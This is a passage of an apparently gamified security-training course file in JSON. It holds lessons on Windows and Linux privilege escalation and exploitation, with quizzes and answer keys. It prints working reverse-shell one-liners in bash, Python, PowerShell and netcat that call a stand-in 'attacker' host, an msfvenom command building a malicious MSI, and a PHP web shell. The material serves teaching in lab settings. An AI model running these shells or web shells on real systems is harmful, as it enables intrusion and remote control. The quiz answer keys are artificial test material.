HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun\nreg query HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun\n# Check if any referenced binary is writable\nfor /f 'tokens=3' %a in ('reg query HKCU...Run') do icacls %a"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Registry autorun entries execute at...","opts":["Boot only","Every user login","Installation only","Shutdown"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-service-path","cat":"Privilege Escalation","title":"Unquoted Service Path Exploitation","diff":2,"xp":150,"intro":"Exploit Windows path resolution for unquoted service binary paths.","sections":[{"type":"text","content":"Windows resolves unquoted paths with spaces by trying shorter paths first. Place a binary at the earlier path to execute your code."},{"type":"code","lang":"bash","content":"# Find unquoted service paths\nwmic service get name,displayname,pathname | findstr /i 'auto' | findstr /i /v 'c:windows'\n# Example: C:Program FilesMy Appservice.exe\n# Windows tries: C:Program.exe, C:Program FilesMy.exe\ncopy payload.exe 'C:Program FilesMy.exe'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Unquoted service paths are exploitable when...","opts":["The path is short","The path has spaces and writable intermediate directories","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-alwaysinstallelevated","cat":"Privilege Escalation","title":"AlwaysInstallElevated Exploitation","diff":2,"xp":150,"intro":"Install MSI packages with SYSTEM privileges.","sections":[{"type":"text","content":"When AlwaysInstallElevated is set in both HKLM and HKCU, any user can install MSI packages as SYSTEM."},{"type":"code","lang":"bash","content":"reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated\nreg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated\n# Generate malicious MSI\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f msi -o evil.msi\nmsiexec /quiet /qn /i evil.msi"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"AlwaysInstallElevated must be set in...","opts":["HKLM only","Both HKLM and HKCU","HKCU only","Neither"],"ans":2},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"ex-revshell-bash","cat":"Exploitation","title":"Bash Reverse Shell","diff":1,"xp":50,"intro":"The most common reverse shell one-liner.","sections":[{"type":"text","content":"Bash's /dev/tcp creates a TCP connection. Redirect stdin/stdout/stderr through it for a remote shell."},{"type":"code","lang":"bash","content":"bash -i >& /dev/tcp/attacker/4444 0>&1\n# Listener: nc -nlvp 4444"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"This reverse shell uses...","opts":["Python","Bash's built-in /dev/tcp for TCP connections","Netcat","SSH"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-revshell-python","cat":"Exploitation","title":"Python Reverse Shell","diff":1,"xp":50,"intro":"Python reverse shell works on almost any Linux/Mac system.","sections":[{"type":"text","content":"Python is installed on most systems. Use socket + dup2 + pty.spawn for a clean reverse shell."},{"type":"code","lang":"python","content":"import socket,os,pty\ns=socket.socket()\ns.connect(('attacker',4444))\n[os.dup2(s.fileno(),i) for i in range(3)]\npty.spawn('/bin/bash')"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Python reverse shells are reliable because...","opts":["Python is fast","Python is installed on most Unix systems","Python is compiled","Python uses UDP"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-revshell-powershell","cat":"Exploitation","title":"PowerShell Reverse Shell","diff":1,"xp":75,"intro":"PowerShell reverse shell for Windows targets.","sections":[{"type":"text","content":"PowerShell creates TCP connections, reads commands, executes them, and sends output back."},{"type":"code","lang":"powershell","content":"$c=New-Object Net.Sockets.TCPClient('attacker',4444)\n$s=$c.GetStream()\n[byte[]]$b=0..65535|%{0}\nwhile(($i=$s.Read($b,0,$b.Length))-ne 0){\n  $d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i)\n  $r=(iex $d 2>&1|Out-String)\n  $s.Write([Text.Encoding]::ASCII.GetBytes($r),0,$r.Length)\n}"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"PowerShell reverse shells work on...","opts":["Linux only","Windows systems (PowerShell is built-in)","Mac only","BSD only"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-revshell-nc","cat":"Exploitation","title":"Netcat Reverse Shell","diff":1,"xp":50,"intro":"Classic netcat shell \u2014 simple and effective.","sections":[{"type":"text","content":"Netcat with -e flag creates a reverse shell. Some versions don't have -e; use named pipes as an alternative."},{"type":"code","lang":"bash","content":"# With -e flag\nnc attacker 4444 -e /bin/bash\n# Without -e (using named pipe)\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc attacker 4444 > /tmp/f"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"The mkfifo alternative is needed when...","opts":["Netcat is missing","Netcat doesn't have the -e flag","The network is slow","Bash is unavailable"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-webshell-php","cat":"Exploitation","title":"PHP Web Shell","diff":1,"xp":75,"intro":"The simplest persistent backdoor for web servers.","sections":[{"type":"text","content":"A PHP web shell accepts commands via HTTP. Upload through any file upload vulnerability."},{"type":"code","lang":"php","content":"<?php system($_GET['cmd']); ?>\n// Usage: http://target/shell.php?cmd=id\n\n// More featured:\n<?php\nif(isset($_REQUEST['cmd'])){\n  echo '<pre>'.shell_exec($_REQUEST['cmd']).'</pre>';\n}\n?>"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A web shell persists because...","opts":["It runs in memory","It's a file on the web server that accepts commands via HTTP","It modifies the kernel","It uses cron"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp 